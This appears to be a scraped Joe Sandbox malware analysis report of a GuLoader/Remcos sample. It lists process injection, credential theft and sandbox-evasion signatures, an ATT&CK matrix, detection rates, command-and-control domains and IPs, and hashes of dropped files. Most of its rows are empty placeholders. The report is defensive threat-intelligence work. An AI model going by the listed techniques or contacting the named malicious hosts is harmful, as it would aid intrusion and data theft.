Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Code function: | 13_2_0040DD85 |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | API coverage: |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Last function: |
Source: | Thread sleep count: | Jump to behavior |
Source: | Code function: | 0_2_00405841 | |
Source: | Code function: | 0_2_00406393 | |
Source: | Code function: | 0_2_004027FB | |
Source: | Code function: | 8_2_20A010F1 | |
Source: | Code function: | 8_2_20A06580 | |
Source: | Code function: | 13_2_0040AE51 | |
Source: | Code function: | 14_2_00407EF8 |
Source: | Code function: | 13_2_00418981 |
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | API call chain: | graph_0-3035 | ||
Source: | API call chain: | graph_14-34115 |
Source: | Process information queried: | Jump to behavior |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 8_3_04ECA639 |
Source: | Code function: | 8_2_20A060E2 |
Source: | Code function: | 13_2_0040DD85 |
Source: | Code function: | 13_2_004044A4 |
Source: | Code function: | 8_2_20A04AB4 |
Source: | Code function: | 8_2_20A0724E |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
Source: | Code function: | 8_2_20A060E2 | |
Source: | Code function: | 8_2_20A02639 | |
Source: | Code function: | 8_2_20A02B1C |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 8_2_20A02933 |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 8_2_20A02264 |
Source: | Code function: | 14_2_004082CD |
Source: | Code function: | 0_2_00406072 |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | Code function: | 14_2_004033F0 | |
Source: | Code function: | 14_2_00402DB3 | |
Source: | Code function: | 14_2_00402DB3 |
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 11 Native API | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 2 Obfuscated Files or Information | 11 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 112 Command and Scripting Interpreter | Logon Script (Windows) | 212 Process Injection | 1 Software Packing | 2 Credentials in Registry | 4 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | 1 Credentials In Files | 29 System Information Discovery | Distributed Component Object Model | 11 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Masquerading | LSA Secrets | 41 Security Software Discovery | SSH | 2 Clipboard Data | 113 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Modify Registry | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 41 Virtualization/Sandbox Evasion | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 212 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
42% | ReversingLabs | Win32.Trojan.GuLoader | ||
30% | Virustotal | Browse | ||
100% | Avira | HEUR/AGEN.1331786 | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
13% | Virustotal | Browse | ||
4% | Virustotal | Browse | ||
20% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
100% | URL Reputation | malware | ||
100% | URL Reputation | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
100% | URL Reputation | phishing | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
19% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
18% | Virustotal | Browse | ||
0% | Virustotal | Browse | ||
0% | Virustotal | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
learfo55ozj01.duckdns.org | 193.222.96.21 | true | true |
| unknown |
geoplugin.net | 178.237.33.50 | true | false |
| unknown |
ricohltd.top | 104.21.60.38 | true | false |
| unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
104.21.60.38 | ricohltd.top | United States | 13335 | CLOUDFLARENETUS | false | |
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false | |
193.222.96.21 | learfo55ozj01.duckdns.org | Germany | 3303 | SWISSCOMSwisscomSwitzerlandLtdCH | true |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1430778 |
Start date and time: | 2024-04-24 07:11:54 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 11m 3s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 20 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exerenamed because original name is a hash value |
Original Sample Name: | 130 12.04.2024 ..exe |
Detection: | MAL |
Classification: | mal100.phis.troj.spyw.evad.winEXE@23/19@4/3 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 72.21.81.240
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 1852 because it is empty
- HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- Not all processes where analyzed, report is missing behavior information
- Report creation exceeded maximum time and may have missing disassembly code information.
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size exceeded maximum capacity and may have missing disassembly code.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
06:13:12 | Autostart | |
06:13:20 | Autostart | |
07:12:43 | API Interceptor | |
07:13:48 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
104.21.60.38 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | FormBook | Browse |
| ||
178.237.33.50 | Get hash | malicious | Remcos | Browse |
| |
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
193.222.96.21 | Get hash | malicious | GuLoader, Remcos | Browse | ||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
learfo55ozj01.duckdns.org | Get hash | malicious | GuLoader, Remcos | Browse |
| |
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
ricohltd.top | Get hash | malicious | GuLoader, Remcos | Browse |
| |
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
geoplugin.net | Get hash | malicious | Remcos, DBatLoader | Browse |
| |
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
SWISSCOMSwisscomSwitzerlandLtdCH | Get hash | malicious | GuLoader, Remcos | Browse |
| |
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | AgentTesla | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
ATOM86-ASATOM86NL | Get hash | malicious | Remcos | Browse |
| |
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | FormBook, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AsyncRAT, PureLog Stealer, RedLine | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
|
⊘No context
Process: | C:\Program Files (x86)\Windows Mail\wab.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 965 |
Entropy (8bit): | 5.0061630437862155 |
Encrypted: | false |
SSDEEP: | 12:tkbOnd6UGkMyGWKyGXPVGArwY3o/IomaoHNmGNArpv/mOAaNO+ao9W7iN5zzkw7T:qbCdVauKyGX85jrvXhNlT3/7sYDsro |
MD5: | 664DA71A99A7A7C426134240B73EF767 |
SHA1: | 33EAC84BB6B07F00593F05413A64CD8738B8A6E7 |
SHA-256: | 146F13F7649B0BB05ECAA2386D7E8DC23E5BA7B69A36919E17E994E63E9F7BA5 |
SHA-512: | DCA9DC8FE7ED040B134D138846C0F3BA940DBCBE9883E19E704D06B8CA737E3FE4EE08AC5F98814E804E7D7716B580FBC4F7971AAD9DDC3887565FD07C4C674D |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 8003 |
Entropy (8bit): | 4.838950934453595 |
Encrypted: | false |
SSDEEP: | 192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J |
MD5: | 4C24412D4F060F4632C0BD68CC9ECB54 |
SHA1: | 3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF |
SHA-256: | 411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE |
SHA-512: | 6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Windows Mail\wab.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15728640 |
Entropy (8bit): | 0.10807997132117475 |
Encrypted: | false |
SSDEEP: | 1536:GSB2jpSB2jFSjlK/gw/ZweshzbOlqVqww/ZXesozbElqVqgesKzbdzb+zb6:Ga6amUueqaJEeqv7tW |
MD5: | 40D660B4AE3EF5A4D0EDCE7216A746FD |
SHA1: | 4725EF64323F955EFE529DA3EE8F7DC0EA1E8626 |
SHA-256: | D264158F0DB89FF6E751CF3697F21AD1B462A3866A737B0836194672AE24B67A |
SHA-512: | 91044A1F5380FB982FAE2ACA51AF917C239E6A1D04798E3262037B5670EA37DBB7A7C5AA4197C8A7C7514790EE465B3183504A152F501F37729617DE898F8E22 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Windows Mail\wab.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2 |
Entropy (8bit): | 1.0 |
Encrypted: | false |
SSDEEP: | 3:Qn:Qn |
MD5: | F3B25701FE362EC84616A93A45CE9998 |
SHA1: | D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB |
SHA-256: | B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209 |
SHA-512: | 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe |
File Type: | |
Category: | dropped |
Size (bytes): | 61481 |
Entropy (8bit): | 5.302242719886632 |
Encrypted: | false |
SSDEEP: | 1536:cwCVtHft7/anji7OG2BP79MU59/AmW1K7V:cJt7SnjHG2Bj9V3AmW85 |
MD5: | 030CE4392C4A8CC1B477BC3DEEACB683 |
SHA1: | 8F36406D9572E6CCF966FB69C0934C234E0617E6 |
SHA-256: | 7E9DECD5F91E30B000266DB010C2AD399BFD06F64EC43F48CA0F3BC36D69CA6C |
SHA-512: | 3EC59592857D073EA3F59CD5279FDD4D862BA0A102DE7BB3F96DB73B64AF362C5F017802AFE78CB5299A0185F406E4FEC097C9986B74D591183AB2ABA114E4F4 |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Fattighjlps\Assistentuddannelsen7\anfrsels.dra
Download File
Process: | C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe |
File Type: | |
Category: | dropped |
Size (bytes): | 583528 |
Entropy (8bit): | 1.0249509792288733 |
Encrypted: | false |
SSDEEP: | 768:MKlDYoi4bR/umx0xHe+Z5zr5KG6RHKf0MBnc9eoz/vh7un9OpOr2iRWAtbWnUelJ:M3KUzBbeJN0AtMmKBdiQiwjEabLL15B |
MD5: | C3921A40547297639160FF791C646E79 |
SHA1: | EF4133C604B8160A9562F5F734054FB26D1E6D23 |
SHA-256: | 1B4DD3B525A74AF08166BF0793C169BB5769BEC328CD5415053EA899CD2973DE |
SHA-512: | CF2F68A1F57690A7446F1D76527E558FF2BAAD0C77537E3579EBE7FD9852E14EEE533B54A287D3728F5EDDE5C6C1DE1AA19A4AFB89FC6A09566A5923486AD725 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Fattighjlps\Assistentuddannelsen7\backhatch.amf
Download File
Process: | C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe |
File Type: | |
Category: | dropped |
Size (bytes): | 259130 |
Entropy (8bit): | 1.0295127854772248 |
Encrypted: | false |
SSDEEP: | 768:4Uk7S6WKjfYCXfsYmLqQ6w1Hj69IMRBKoEjR4525ZyzAVFSWJPcO3+pyYLwwdhei:N5l/GVXeHN |
MD5: | ABA7992ED97E03F3BE41BF450C4FF558 |
SHA1: | EC577460A2B5788E6A32C8D8281B17D3C6175092 |
SHA-256: | C7BBCF0AEB9DE2231C1D51E8BACFCCD7B4B19E1417A7B9AD6E5CC426FA9F85E7 |
SHA-512: | A90778F1E332FAC284352DC3F0CEA45D7C115B3807C799F6A6B7AF6DE513745BE5C44D0A9EB42E2B968D5B1111B48EB7882B27F2DFCE08B7D172CD65F47C2256 |
Malicious: | false |
Preview: |
